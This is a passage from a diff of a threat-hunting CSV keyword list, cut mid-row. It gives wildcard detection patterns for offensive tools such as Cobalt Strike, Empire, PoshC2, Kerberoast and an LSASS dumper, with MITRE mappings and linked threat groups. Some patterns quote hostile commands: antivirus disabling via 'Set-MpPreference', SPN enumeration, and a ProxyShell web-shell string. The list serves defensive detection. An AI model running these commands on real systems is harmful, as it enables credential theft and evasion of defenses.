TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*setLoaderFlagZero*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*Set-MacAttribute.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*set-killdate *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*Set-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setLoaderFlagZero*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*Set-MacAttribute.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Set-MpPreference -DisableRealtimeMonitoring *true*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*","offensive_tool_keyword","ProxyShell","Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207","T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505","TA0001 - TA0002 - TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation Tools","https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*setoolkit *","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9394","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" -"*SetProcessInjection*encryptor.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" -"*SetProcessInjection-main*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" -"*set-pushover-applicationtoken*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
-"*set-pushover-userkeys*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Set-RemotePSRemoting*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Set-RemoteWMI.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Set-ServiceBinPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*setoolkit *","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. 
SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*SetProcessInjection*encryptor.py*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*SetProcessInjection-main*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*set-pushover-applicationtoken*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*set-pushover-userkeys*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Set-RemotePSRemoting*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-RemoteWMI.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Set-ServiceBinPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*setspn -A HTTP/*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 
Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*setspn.exe -T medin -Q */*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*setthreadcontext.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*setthreadcontext.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*Setting up GFlags & SilentProcessExit settings in registry?*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*setuid_setgid.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*setup_apfell.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*setup_obfuscate_xor_key*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*setthreadcontext.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*setthreadcontext.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 